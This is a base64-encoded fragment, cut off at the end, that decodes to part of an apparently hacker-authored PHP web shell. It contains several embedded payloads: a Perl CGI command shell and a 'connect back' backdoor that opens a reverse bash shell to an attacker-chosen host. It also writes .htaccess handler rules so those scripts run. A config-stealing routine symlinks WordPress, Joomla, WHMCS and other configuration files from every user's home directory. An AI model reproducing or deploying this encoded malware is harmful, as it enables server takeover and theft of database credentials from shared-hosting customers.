ZlRzTkNnMEtKRUZqZEdsdmJpQTlJQ1JwYm5zbllTZDlPdzBLSkVGamRHbHZiaUE5SUNKc2IyZHBiaUlnYVdZb0pFRmpkR2x2YmlCbGNTQWlJaWs3SUNNZ2JtOGdZV04wYVc5dUlITndaV05wWm1sbFpDd2dkWE5sSUdSbFptRjFiSFFOQ2cwS0l5Qm5aWFFnZEdobElHUnBjbVZqZEc5eWVTQnBiaUIzYUdsamFDQjBhR1VnWTI5dGJXRnVaSE1nZDJsc2JDQmlaU0JsZUdWamRYUmxaQTBLSkVOMWNuSmxiblJFYVhJZ1BTQWthVzU3SjJRbmZUc05DbU5vYjNBb0pFTjFjbkpsYm5SRWFYSWdQU0JnSkVOdFpGQjNaR0FwSUdsbUtDUkRkWEp5Wlc1MFJHbHlJR1Z4SUNJaUtUc05DZzBLSkV4dloyZGxaRWx1SUQwZ0pFTnZiMnRwWlhON0oxTkJWa1ZFVUZkRUozMGdaWEVnSkZCaGMzTjNiM0prT3cwS0RRcHBaaWdrUVdOMGFXOXVJR1Z4SUNKc2IyZHBiaUlnZkh3Z0lTUk1iMmRuWldSSmJpa2dJeUIxYzJWeUlHNWxaV1J6TDJoaGN5QjBieUJzYjJkcGJnMEtldzBLQ1NaUVpYSm1iM0p0VEc5bmFXNDdEUW9OQ24wTkNtVnNjMmxtS0NSQlkzUnBiMjRnWlhFZ0ltTnZiVzFoYm1RaUtTQWpJSFZ6WlhJZ2QyRnVkSE1nZEc4Z2NuVnVJR0VnWTI5dGJXRnVaQTBLZXcwS0NTWkZlR1ZqZFhSbFEyOXRiV0Z1WkRzTkNuME5DbVZzYzJsbUtDUkJZM1JwYjI0Z1pYRWdJblZ3Ykc5aFpDSXBJQ01nZFhObGNpQjNZVzUwY3lCMGJ5QjFjR3h2WVdRZ1lTQm1hV3hsRFFwN0RRb0pKbFZ3Ykc5aFpFWnBiR1U3RFFwOURRcGxiSE5wWmlna1FXTjBhVzl1SUdWeElDSmtiM2R1Ykc5aFpDSXBJQ01nZFhObGNpQjNZVzUwY3lCMGJ5QmtiM2R1Ykc5aFpDQmhJR1pwYkdVTkNuc05DZ2ttUkc5M2JteHZZV1JHYVd4bE93MEtmUTBLWld4emFXWW9KRUZqZEdsdmJpQmxjU0FpYkc5bmIzVjBJaWtnSXlCMWMyVnlJSGRoYm5SeklIUnZJR3h2WjI5MWRBMEtldzBLQ1NaUVpYSm1iM0p0VEc5bmIzVjBPdzBLZlE9PSc7CgokZmlsZSA9IGZvcGVuKCJpem8uY2luIiAsIncrIik7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGNnaXNoZWxsaXpvY2luKSk7CmZjbG9zZSgkZmlsZSk7CiAgICBjaG1vZCgiaXpvLmNpbiIsMDc1NSk7CiRuZXRjYXRzaGVsbCA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0RRb2dJQ0FnSUNCMWMyVWdVMjlqYTJWME93MEtJQ0FnSUNBZ2NISnBiblFnSWtSaGRHRWdRMmhoCk1ITWdRMjl1Ym1WamRDQkNZV05ySUVKaFkydGtiMjl5WEc1Y2JpSTdEUW9nSUNBZ0lDQnBaaUFvSVNSQlVrZFdXekJkS1NCN0RRb2cKSUNBZ0lDQWdJSEJ5YVc1MFppQWlWWE5oWjJVNklDUXdJRnRJYjNOMFhTQThVRzl5ZEQ1Y2JpSTdEUW9nSUNBZ0lDQWdJR1Y0YVhRbwpNU2s3RFFvZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0J3Y21sdWRDQWlXeXBkSUVSMWJYQnBibWNnUVhKbmRXMWxiblJ6WEc0aU93MEtJQ0FnCklDQWdKR2h2YzNRZ1BTQWtRVkpIVmxzd1hUc05DaUFnSUNBZ0lDUndiM0owSUQwZ09EQTdEUW9nSUNBZ0lDQnBaaUFvSkVGU1IxWmIKTVYwcElIc05DaUFnSUNBZ0lDQWdKSEJ2Y25RZ1BTQWtRVkpIVmxzeFhUc05DaUFnSUNBZ0lIME5DaUFnSUNBZ0lIQnlhVzUwSUNKYgpLbDBnUTI5dWJtVmpkR2x1Wnk0dUxseHVJanNOQ2lBZ0lDQWdJQ1J3Y205MGJ5QTlJR2RsZEhCeWIzUnZZbmx1WVcxbEtDZDBZM0FuCktTQjhmQ0JrYVdVb0lsVnVhMjV2ZDI0Z1VISnZkRzlqYjJ4Y2JpSXBPdzBLSUNBZ0lDQWdjMjlqYTJWMEtGTkZVbFpGVWl3Z1VFWmYKU1U1RlZDd2dVMDlEUzE5VFZGSkZRVTBzSUNSd2NtOTBieWtnZkh3Z1pHbGxJQ2dpVTI5amEyVjBJRVZ5Y205eVhHNGlLVHNOQ2lBZwpJQ0FnSUcxNUlDUjBZWEpuWlhRZ1BTQnBibVYwWDJGMGIyNG9KR2h2YzNRcE93MEtJQ0FnSUNBZ2FXWWdLQ0ZqYjI1dVpXTjBLRk5GClVsWkZVaXdnY0dGamF5QWlVMjVCTkhnNElpd2dNaXdnSkhCdmNuUXNJQ1IwWVhKblpYUXBLU0I3RFFvZ0lDQWdJQ0FnSUdScFpTZ2kKVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1JjYmlJcE93MEtJQ0FnSUNBZ2ZRMEtJQ0FnSUNBZ2NISnBiblFnSWxzcVhTQlRjR0YzYm1sdQpaeUJUYUdWc2JGeHVJanNOQ2lBZ0lDQWdJR2xtSUNnaFptOXlheWdnS1NrZ2V3MEtJQ0FnSUNBZ0lDQnZjR1Z1S0ZOVVJFbE9MQ0krCkpsTkZVbFpGVWlJcE93MEtJQ0FnSUNBZ0lDQnZjR1Z1S0ZOVVJFOVZWQ3dpUGlaVFJWSldSVklpS1RzTkNpQWdJQ0FnSUNBZ2IzQmwKYmloVFZFUkZVbElzSWo0bVUwVlNWa1ZTSWlrN0RRb2dJQ0FnSUNBZ0lHVjRaV01nZXljdlltbHVMM05vSjMwZ0p5MWlZWE5vSnlBdQpJQ0pjTUNJZ2VDQTBPdzBLSUNBZ0lDQWdJQ0JsZUdsMEtEQXBPdzBLSUNBZ0lDQWdmUTBLSUNBZ0lDQWdjSEpwYm5RZ0lsc3FYU0JFCllYUmhZMmhsWkZ4dVhHNGlPdz09JzsKCiRmaWxlID0gZm9wZW4oImRjLnBsIiAsIncrIik7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJG5ldGNhdHNoZWxsKSk7CmZjbG9zZSgkZmlsZSk7CiAgICBjaG1vZCgiZGMucGwiLDA3NTUpOwoKICAgZWNobyAiPC9icj48YSBocmVmPSdieXBhc3MvY2dpX3NoZWxsL2l6by5jaW4nIHRhcmdldD0nX2JsYW5rJz4gR28gVG8gW0NnaV9TaGVsbF0gPj48L2E+IjsKYnJlYWs7CgpjYXNlICJNaW5pX0NnaSI6CiAgICBAbWtkaXIoJ2J5cGFzcy9jZ2lydW4nLCAwNzU1KTsKICAgIGNoZGlyKCdieXBhc3MvY2dpcnVuJyk7CiAgICAgICAgJHRrbCA9ICIuaHRhY2Nlc3MiOwogICAgICAgICR0a2xfbm90ZSA9ICIkdGtsIjsKICAgICAgICAkZG9keSA9IGZvcGVuICgkdGtsX25vdGUgLCAndycpIG9yIGRpZSAoImRvZHkgYSYjMjMxOyYjMzA1O2xhbWFkJiMzMDU7ISIpOwogICAgICAgICRtZXRpbiA9ICJBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnByIjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCAkbWV0aW4gKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRjZ2ljbyA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0lDMUpMM1Z6Y2k5c2IyTmhiQzlpWVc1a2JXRnBiZzBLSXcwS0l5QlFaWEpzUzJsMExUQXVNU0F0CklGdEViMkZ5SUhWelpYSnBhU0JwYm5KbFoybHpkSEpoZEdrZ2NHOTBJSFpsWkdWaElHeHBibXQxY21sc1pTNGdYUTBLSXcwS0l5QmoKYldRdWNHdzZJRkoxYmlCamIyMXRZVzVrY3lCdmJpQmhJSGRsWW5ObGNuWmxjZzBLRFFwMWMyVWdjM1J5YVdOME93MEtEUXB0ZVNBbwpKR050WkN3Z0pVWlBVazBwT3cwS0RRb2tmRDB4T3cwS0RRcHdjbWx1ZENBaVEyOXVkR1Z1ZEMxVWVYQmxPaUIwWlhoMEwyaDBiV3hjCmNseHVJanNOQ25CeWFXNTBJQ0pjY2x4dUlqc05DZzBLSXlCSFpYUWdjR0Z5WVcxbGRHVnljdzBLRFFvbFJrOVNUU0E5SUhCaGNuTmwKWDNCaGNtRnRaWFJsY25Nb0pFVk9WbnNuVVZWRlVsbGZVMVJTU1U1SEozMHBPdzBLRFFwcFppaGtaV1pwYm1Wa0lDUkdUMUpOZXlkagpiV1FuZlNrZ2V3MEtJQ0FrWTIxa0lEMGdKRVpQVWsxN0oyTnRaQ2Q5T3cwS2ZRMEtEUXB3Y21sdWRDQW5QRWhVVFV3K0RRbzhZbTlrCmVUNE5DanhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUlrZEZWQ0krRFFvOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnQKWlQwaVkyMWtJaUJ6YVhwbFBUUTFJSFpoYkhWbFBTSW5JQzRnSkdOdFpDQXVJQ2NpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcApkQ0lnZG1Gc2RXVTlJbEoxYmlJK0RRbzhMMlp2Y20wK0RRbzhjSEpsUGljN0RRb05DbWxtS0dSbFptbHVaV1FnSkVaUFVrMTdKMk50ClpDZDlLU0I3RFFvZ0lIQnlhVzUwSUNKU1pYTjFiSFJ6SUc5bUlDY2tZMjFrSnlCbGVHVmpkWFJwYjI0NlhHNWNiaUk3RFFvZ0lIQnkKYVc1MElDSXRJbmc0TURzTkNpQWdjSEpwYm5RZ0lseHVJanNOQ2cwS0lDQnZjR1Z1S0VOTlJDd2dJaWdrWTIxa0tTQXlQaVl4SUh3aQpLU0I4ZkNCd2NtbHVkQ0FpUTI5MWJHUWdibTkwSUdWNFpXTjFkR1VnWTI5dGJXRnVaQ0k3RFFvTkNpQWdkMmhwYkdVb1BFTk5SRDRwCklIc05DaUFnSUNCd2NtbHVkRHNOQ2lBZ2ZRMEtEUW9nSUdOc2IzTmxLRU5OUkNrN0RRb2dJSEJ5YVc1MElDSXRJbmc0TURzTkNpQWcKY0hKcGJuUWdJbHh1SWpzTkNuME5DZzBLY0hKcGJuUWdJand2Y0hKbFBpSTdEUW9OQ25OMVlpQndZWEp6WlY5d1lYSmhiV1YwWlhKegpJQ2drS1NCN0RRb2dJRzE1SUNWeVpYUTdEUW9OQ2lBZ2JYa2dKR2x1Y0hWMElEMGdjMmhwWm5RN0RRb05DaUFnWm05eVpXRmphQ0J0CmVTQWtjR0ZwY2lBb2MzQnNhWFFvSnlZbkxDQWthVzV3ZFhRcEtTQjdEUW9nSUNBZ2JYa2dLQ1IyWVhJc0lDUjJZV3gxWlNrZ1BTQnoKY0d4cGRDZ25QU2NzSUNSd1lXbHlMQ0F5S1RzTkNpQWdJQ0FOQ2lBZ0lDQnBaaWdrZG1GeUtTQjdEUW9nSUNBZ0lDQWtkbUZzZFdVZwpQWDRnY3k5Y0t5OGdMMmNnT3cwS0lDQWdJQ0FnSkhaaGJIVmxJRDErSUhNdkpTZ3VMaWt2Y0dGamF5Z25ZeWNzYUdWNEtDUXhLU2t2ClpXYzdEUW9OQ2lBZ0lDQWdJQ1J5WlhSN0pIWmhjbjBnUFNBa2RtRnNkV1U3RFFvZ0lDQWdmUTBLSUNCOURRb05DaUFnY21WMGRYSnUKSUNWeVpYUTdEUXA5JzsKCiRmaWxlID0gZm9wZW4oImNnaS5wciIgLCJ3KyIpOwokd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRjZ2ljbykpOwpmY2xvc2UoJGZpbGUpOwogICAgY2htb2QoImNnaS5wciIsMDc1NSk7CiAgIGVjaG8gIjwvYnI+PGEgaHJlZj0nYnlwYXNzL2NnaXJ1bi9jZ2kucHInIHRhcmdldD0nX2JsYW5rJz4gR28gVG8gW01pbmkgQ2dpXSA+PjwvYT4iOwpicmVhazsKY2FzZSAiQ29uZmlnX1NoZWxsIjoKICAgIEBta2RpcignYnlwYXNzL2NvbmZpZ2xlcicsIDA3NTUpOwogICAgY2hkaXIoJ2J5cGFzcy9jb25maWdsZXInKTsKICAgICAgICAkdGtsID0gIi5odGFjY2VzcyI7CiAgICAgICAgJHRrbF9ub3RlID0gIiR0a2wiOwogICAgICAgICRkb2R5ID0gZm9wZW4gKCR0a2xfbm90ZSAsICd3Jykgb3IgZGllICgiZG9keSBhJiMyMzE7JiMzMDU7bGFtYWQmIzMwNTshIik7CiAgICAgICAgJG1ldGluID0gIkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuaXpvIjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCAkbWV0aW4gKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRjb25maWdzaGVsbCA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0lDMUpMM1Z6Y2k5c2IyTmhiQzlpWVc1a2JXbHVEUXB3Y21sdWRDQWlRMjl1ZEdWdWRDMTBlWEJsT2lCMFpYaDBMMmgwYld4Y2JseHVJanNOQ25CeWFXNTBKendoUkU5RFZGbFFSU0JvZEcxc0lGQlZRa3hKUXlBaUxTOHZWek5ETHk5RVZFUWdXRWhVVFV3Z01TNHdJRlJ5WVc1emFYUnBiMjVoYkM4dlJVNGlJQ0pvZEhSd09pOHZkM2QzTG5jekxtOXlaeTlVVWk5NGFIUnRiREV2UkZSRUwzaG9kRzFzTVMxMGNtRnVjMmwwYVc5dVlXd3VaSFJrSWo0TkNqeG9kRzFzSUhodGJHNXpQU0pvZEhSd09pOHZkM2QzTG5jekxtOXlaeTh4T1RrNUwzaG9kRzFzSWo0TkNqeG9aV0ZrUGcwS1BHMWxkR0VnYUhSMGNDMWxjWFZwZGowaVEyOXVkR1Z1ZEMxTVlXNW5kV0ZuWlNJZ1kyOXVkR1Z1ZEQwaVpXNHRkWE1pSUM4K0RRbzhiV1YwWVNCb2RIUndMV1Z4ZFdsMlBTSkRiMjUwWlc1MExWUjVjR1VpSUdOdmJuUmxiblE5SW5SbGVIUXZhSFJ0YkRzZ1kyaGhjbk5sZEQxMWRHWXRPQ0lnTHo0TkNqeDBhWFJzWlQ1YmZsMGdRM2xpTTNJdFJGb2dRMjl1Wm1sbklDMGdXMzVkSUR3dmRHbDBiR1UrRFFvOGMzUjViR1VnZEhsd1pUMGlkR1Y0ZEM5amMzTWlQZzBLTG01bGQxTjBlV3hsTVNCN0RRb2dabTl1ZEMxbVlXMXBiSGs2SUZSaGFHOXRZVHNOQ2lCbWIyNTBMWE5wZW1VNklIZ3RjMjFoYkd3N0RRb2dabTl1ZEMxM1pXbG5hSFE2SUdKdmJHUTdEUW9nWTI5c2IzSTZJQ013TUVaR1JrWTdEUW9nSUhSbGVIUXRZV3hwWjI0NklHTmxiblJsY2pzTkNuME5Dand2YzNSNWJHVStEUW84TDJobFlXUStEUW9uT3cwS2MzVmlJR3hwYkhzTkNpQWdJQ0FvSkhWelpYSXBJRDBnUUY4N0RRb2tiWE55SUQwZ2NYaDdjSGRrZlRzTkNpUnJiMnhoUFNSdGMzSXVJaThpTGlSMWMyVnlPdzBLSkd0dmJHRTlmbk12WEc0dkwyYzdJQTBLYzNsdGJHbHVheWduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJsdVkyeDFaR1Z6TDJOdmJtWnBaM1Z5WlM1d2FIQW5MQ1JyYjJ4aExpY3RjMmh2Y0M1MGVIUW5LVHNOQ25ONWJXeHBibXNvSnk5b2IyMWxMeWN1SkhWelpYSXVKeTl3ZFdKc2FXTmZhSFJ0YkM5aGJXVnRZbVZ5TDJOdmJtWnBaeTVwYm1NdWNHaHdKeXdrYTI5c1lTNG5MV0Z0WlcxaVpYSXVkSGgwSnlrN0RRcHplVzFzYVc1cktDY3ZhRzl0WlM4bkxpUjFjMlZ5TGljdmNIVmliR2xqWDJoMGJXd3ZZMjl1Wm1sbkxtbHVZeTV3YUhBbkxDUnJiMnhoTGljdFlXMWxiV0psY2pJdWRIaDBKeWs3RFFwemVXMXNhVzVyS0NjdmFHOXRaUzhuTGlSMWMyVnlMaWN2Y0hWaWJHbGpYMmgwYld3dmJXVnRZbVZ5Y3k5amIyNW1hV2QxY21GMGFXOXVMbkJvY0Njc0pHdHZiR0V1SnkxdFpXMWlaWEp6TG5SNGRDY3BPdzBLYzNsdGJHbHVheWduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJOdmJtWnBaeTV3YUhBbkxDUnJiMnhoTGljeUxuUjRkQ2NwT3cwS2MzbHRiR2x1YXlnbkwyaHZiV1V2Snk0a2RYTmxjaTRuTDNCMVlteHBZMTlvZEcxc0wyWnZjblZ0TDJsdVkyeDFaR1Z6TDJOdmJtWnBaeTV3YUhBbkxDUnJiMnhoTGljdFptOXlkVzB1ZEhoMEp5azdEUXB6ZVcxc2FXNXJLQ2N2YUc5dFpTOG5MaVIxYzJWeUxpY3ZjSFZpYkdsalgyaDBiV3d2WVdSdGFXNHZZMjl1Wmk1d2FIQW5MQ1JyYjJ4aExpYzFMblI0ZENjcE93MEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMMkZrYldsdUwyTnZibVpwWnk1d2FIQW5MQ1JyYjJ4aExpYzBMblI0ZENjcE93MEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMM2R3TFdOdmJtWnBaeTV3YUhBbkxDUnJiMnhoTGljdGQzQXhNeTUwZUhRbktUc05Dbk41Yld4cGJtc29KeTlvYjIxbEx5Y3VKSFZ6WlhJdUp5OXdkV0pzYVdOZmFIUnRiQzlpYkc5bkwzZHdMV052Ym1acFp5NXdhSEFuTENScmIyeGhMaWN0ZDNBdFlteHZaeTUwZUhRbktUc05Dbk41Yld4cGJtc29KeTlvYjIxbEx5Y3VKSFZ6WlhJdUp5OXdkV0pzYVdOZmFIUnRiQzlqYjI1bVgyZHNiMkpoYkM1d2FIQW5MQ1JyYjJ4aExpYzJMblI0ZENjcE93MEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMMmx1WTJ4MVpHVXZaR0l1Y0dod0p5d2thMjlzWVM0bk55NTBlSFFuS1RzTkNuTjViV3hwYm1zb0p5OW9iMjFsTHljdUpIVnpaWEl1Snk5d2RXSnNhV05mYUhSdGJDOWpiMjV1WldOMExuQm9jQ2NzSkd0dmJHRXVKemd1ZEhoMEp5azdEUXB6ZVcxc2FXNXJLQ2N2YUc5dFpTOG5MaVIxYzJWeUxpY3ZjSFZpYkdsalgyaDBiV3d2Yld0ZlkyOXVaaTV3YUhBbkxDUnJiMnhoTGljNUxuUjRkQ2NwT3cwS2MzbHRiR2x1YXlnbkwyaHZiV1V2Snk0a2RYTmxjaTRuTDNCMVlteHBZMTlvZEcxc0wybHVZMngxWkdVdlkyOXVabWxuTG5Cb2NDY3NKR3R2YkdFdUp6RXlMblI0ZENjcE93MEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMMnB2YjIxc1lTOWpiMjVtYVdkMWNtRjBhVzl1TG5Cb2NDY3NKR3R2YkdFdUp5MXFiMjl0YkdFdWRIaDBKeWs3RFFwemVXMXNhVzVyS0NjdmFHOXRaUzhuTGlSMWMyVnlMaWN2Y0hWaWJHbGpYMmgwYld3dmRtSXZhVzVqYkhWa1pYTXZZMjl1Wm1sbkxuQm9jQ2NzSkd0dmJHRXVKeTEyWWk1MGVIUW5LVHNOQ25ONWJXeHBibXNvSnk5b2IyMWxMeWN1SkhWelpYSXVKeTl3ZFdKc2FXTmZhSFJ0YkM5cGJtTnNkV1JsY3k5amIyNW1hV2N1Y0dod0p5d2thMjlzWVM0bkxXbHVZMngxWkdWekxYWmlMblI0ZENjcE93MEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMM2RvYlM5amIyNW1hV2QxY21GMGFXOXVMbkJvY0Njc0pHdHZiR0V1SnkxM2FHMHhOUzUwZUhRbktUc05Dbk41Yld4cGJtc29KeTlvYjIxbEx5Y3VKSFZ6WlhJdUp5OXdkV0pzYVdOZmFIUnRiQzkzYUcxakwyTnZibVpwWjNWeVlYUnBiMjR1Y0dod0p5d2thMjlzWVM0bkxYZG9iV014Tmk1MGVIUW5LVHNOQ25ONWJXeHBibXNvSnk5b2IyMWxMeWN1SkhWelpYSXVKeTl3ZFdKc2FXTmZhSFJ0YkM5M2FHMWpjeTlqYjI1bWFXZDFjbUYwYVc5dUxuQm9jQ2NzSkd0dmJHRXVKeTEzYUcxamN5NTBlSFFuS1RzTkNuTjViV3hwYm1zb0p5OW9iMjFsTHljdUpIVnpaWEl1Snk5d2RXSnNhV05mYUhSdGJDOXpkWEJ3YjNKMEwyTnZibVpwWjNWeVlYUnBiMjR1Y0dod0p5d2thMjlzWVM0bkxYTjFjSEJ2Y25RdWRIaDBKeWs3RFFwemVXMXNhVzVyS0NjdmFHOXRaUzhuTGlSMWMyVnlMaWN2Y0hWaWJHbGpYMmgwYld3dlkyOXVabWxuZFhKaGRHbHZiaTV3YUhBbkxDUnJiMnhoTGljeGQyaHRZM011ZEhoMEp5azdEUXB6ZVcxc2FXNXJLQ2N2YUc5dFpTOG5MaVIxYzJWeUxpY3ZjSFZpYkdsalgyaDBiV3d2YzNWaWJXbDBkR2xqYTJWMExuQm9jQ2NzSkd0dmJHRXVKeTEzYUcxamN6SXVkSGgwSnlrN0RRcHplVzFzYVc1cktDY3ZhRzl0WlM4bkxpUjFjMlZ5TGljdmNIVmliR2xqWDJoMGJXd3ZZMnhwWlc1MGN5OWpiMjVtYVdkMWNtRjBhVzl1TG5Cb2NDY3NKR3R2YkdFdUp5MWpiR2xsYm5SekxuUjRkQ2NwT3cwS2MzbHRiR2x1YXlnbkwyaHZiV1V2Snk0a2RYTmxjaTRuTDNCMVlteHBZMTlvZEcxc0wyTnNhV1Z1ZEM5amIyNW1hV2QxY21GMGFXOXVMbkJvY0Njc0pHdHZiR0V1SnkxamJHbGxiblF1ZEhoMEp5azdEUXB6ZVcxc2FXNXJLQ2N2YUc5dFpTOG5MaVIxYzJWeUxpY3ZjSFZpYkdsalgyaDBiV3d2WTJ4cFpXNTBaWE12WTI5dVptbG5kWEpoZEdsdmJpNXdhSEFuTENScmIyeGhMaWN0WTJ4cFpXNTBjeTUwZUhRbktUc05Dbk41Yld4cGJtc29KeTlvYjIxbEx5Y3VKSFZ6WlhJdUp5OXdkV0pzYVdOZmFIUnRiQzlpYVd4c2FXNW5MMk52Ym1acFozVnlZWFJwYjI0dWNHaHdKeXdrYTI5c1lTNG5MV0pwYkd4cGJtY3VkSGgwSnlrN0lBMEtjM2x0YkdsdWF5Z25MMmh2YldVdkp5NGtkWE5sY2k0bkwzQjFZbXhwWTE5b2RHMXNMMjFoYm1GblpTOWpiMjVtYVdkMWNtRjBhVzl1TG5Cb2NDY3NKR3R2YkdFdUp5MWlhV3hzYVc1bkxuUjRkQ2NwT3lBTkNuTjViV3hwYm1zb0p5OW9iMjFsTHljdUpIVnpaWEl1Snk5d2RXSnNhV05mYUhSdGJDOXRlUzlqYjI1bWFXZDFjbUYwYVc5dUxuQm9jQ2NzSkd0dmJHRXVKeTFpYVd4c2FXNW5MblI0ZENjcE95QU5Dbk41Yld4cGJtc29KeTlvYjIxbEx5Y3VKSFZ6WlhJdUp5OXdkV0pzYVdOZmFIUnRiQzl0ZVhOb2IzQXZZMjl1Wm1sbmRYSmhkR2x2Ymk1d2FIQW5MQ1JyYjJ4aExpY3RZbWxzYkdsdVp5NTBlSFFuS1RzZ0RRcDlEUXBwWmlBb0pFVk9WbnNuVWtWUlZVVlRWRjlOUlZSSVQwUW5mU0JsY1NBblVFOVRWQ2NwSUhzTkNpQWdjbVZoWkNoVFZFUkpUaXdnSkdKMVptWmxjaXdnSkVWT1Zuc25RMDlPVkVWT1ZGOU1SVTVIVkVnbmZTazdEUXA5SUdWc2MyVWdldzBLSUNBa1luVm1abVZ5SUQwZ0pFVk9WbnNuVVZWRlVsbGZVMVJTU1U1SEozMDdEUXA5RFFwQWNHRnBjbk1nUFNCemNHeHBkQ2d2Smk4c0lDUmlkV1ptWlhJcE93MEtabTl5WldGamFDQWtjR0ZwY2lBb1FIQmhhWEp6S1NCN0RRb2dJQ2drYm1GdFpTd2dKSFpoYkhWbEtTQTlJSE53YkdsMEtDODlMeXdnSkhCaGFYSXBPdzBLSUNBa2JtRnRaU0E5ZmlCMGNpOHJMeUF2T3cwS0lDQWtibUZ0WlNBOWZpQnpMeVVvVzJFdFprRXRSakF0T1YxYllTMW1RUzFHTUMwNVhTa3ZjR0ZqYXlnaVF5SXNJR2hsZUNna01Ta3BMMlZuT3cwS0lDQWtkbUZzZFdVZ1BYNGdkSEl2S3k4Z0x6c05DaUFnSkhaaGJIVmxJRDErSUhNdkpTaGJZUzFtUVMxR01DMDVYVnRoTFdaQkxVWXdMVGxkS1M5d1lXTnJLQ0pESWl3Z2FHVjRLQ1F4S1NrdlpXYzdEUW9nSUNSR1QxSk5leVJ1WVcxbGZTQTlJQ1IyWVd4MVpUc05DbjBOQ21sbUlDZ2tSazlTVFh0d1lYTnpmU0JsY1NBaUlpbDdEUXB3Y21sdWRDQW5EUW84WW05a2VTQmpiR0Z6Y3owaWJtVjNVM1I1YkdVeElpQmlaMk52Ykc5eVBTSWpNREF3TURBd0lqNE5Danh3UGtONVlqTnlMV1I2SUVOdmJtWnBaeUE4TDNBK0RRbzhjRDQ4Wm05dWRDQmpiMnh2Y2owaUkwTXdRekJETUNJK1d6d3ZabTl1ZEQ0Z1EyOWtaV1FnUW5rZ1EzbGlNM0l0UkZvZ1BHWnZiblFnWTI5c2IzSTlJaU5ETUVNd1F6QWlQand2Wm05dWRENGdEUW84YzNCaGJpQnBaRDBpY21WemRXeDBYMkp2ZUNJZ1kyeGhjM005SW5Ob2IzSjBYM1JsZUhRaUlHeGhibWM5SW1WdUlqNDhjM0JoYmlCemRIbHNaU0IwYVhSc1pUNE5DanhtYjI1MElHTnZiRzl5UFNJalF6QkRNRU13SWo1OFBDOW1iMjUwUGp3dmMzQmhiajQ4TDNOd1lXNCtJRHhoSUdoeVpXWTlJbWgwZEhBNkx5OTNkM2N1WjJGNllTMW9ZV05yWlhJdWJtVjBMMk5qSWo0TkNqeHpjR0Z1SUhOMGVXeGxQU0owWlhoMExXUmxZMjl5WVhScGIyNDZJRzV2Ym1VaVBqeG1iMjUwSUdOdmJHOXlQU0lqTURCR1JqQXdJajUzZDNjdVoyRjZZUzFvWVdOclpYSXVibVYwTDJOalBDOW1iMjUwUGp3dmMzQmhiajQ4TDJFK0lBMEtQR1p2Ym5RZ1kyOXNiM0k5SWlORE1FTXdRekFpUGwwOEwyWnZiblErUEM5d1BnMEtQR1p2Y20wZ2JXVjBhRzlrUFNKd2IzTjBJajROQ2p4MFpYaDBZWEpsWVNCdVlXMWxQU0p3WVhOeklpQnpkSGxzWlQwaVltOXlaR1Z5T2pGd2VDQmtiM1IwWldRZ0l6QXdSa1pHUmpzZ2QybGtkR2c2SURVME0zQjRPeUJvWldsbmFIUTZJRFF5TUhCNE95QmlZV05yWjNKdmRXNWtMV052Ykc5eU9pTXdRekJETUVNN0lHWnZiblF0Wm1GdGFXeDVPbFJoYUc5dFlUc2dabTl1ZEMxemFYcGxPamh3ZERzZ1kyOXNiM0k2SXpBd1JrWkdSaUlnSUQ0OEwzUmxlSFJoY21WaFBqeGljaUF2UGcwS0ptNWljM0E3UEhBK0RRbzhhVzV3ZFhRZ2JtRnRaVDBpZEdGeUlpQjBlWEJsUFNKMFpYaDBJaUJ6ZEhsc1pUMGlZbTl5WkdWeU9qRndlQ0JrYjNSMFpXUWdJekF3UmtaR1Jqc2dkMmxrZEdnNklESXhNbkI0T3lCaVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd1F6QkRNRU03SUdadmJuUXRabUZ0YVd4NU9sUmhhRzl0WVRzZ1ptOXVkQzF6YVhwbE9qaHdkRHNnWTI5c2IzSTZJekF3UmtaR1Jqc2dJaUFnTHo0OFluSWdMejROQ2ladVluTndPend2Y0Q0TkNqeHdQZzBLUEdsdWNIVjBJRzVoYldVOUlsTjFZbTFwZERFaUlIUjVjR1U5SW5OMVltMXBkQ0lnZG1Gc2RXVTlJa2RsZENCRGIyNW1hV2NpSUhOMGVXeGxQU0ppYjNKa1pYSTZNWEI0SUdSdmRIUmxaQ0FqTURCR1JrWkdPeUIzYVdSMGFEb2dPVGs3SUdadmJuUXRabUZ0YVd4NU9sUmhhRzl0WVRzZ1ptOXVkQzF6YVhwbE9qRXdjSFE3SUdOdmJHOXlPaU13TUVaR1JrWTdJSFJsZUhRdGRISmhibk5tYjNKdE9uVndjR1Z5WTJGelpUc2dhR1ZwWjJoME9qSXpPeUJpWVdOclozSnZkVzVrTFdOdmJHOXlPaU13UXpCRE1FTWlJQzgrUEM5d1BnMEtQQzltYjNKdFBpYzdEUXA5Wld4elpYc05Da0JzYVc1bGN5QTlQQ1JHVDFKTmUzQmhjM045UGpzTkNpUjVJRDBnUUd4cGJtVnp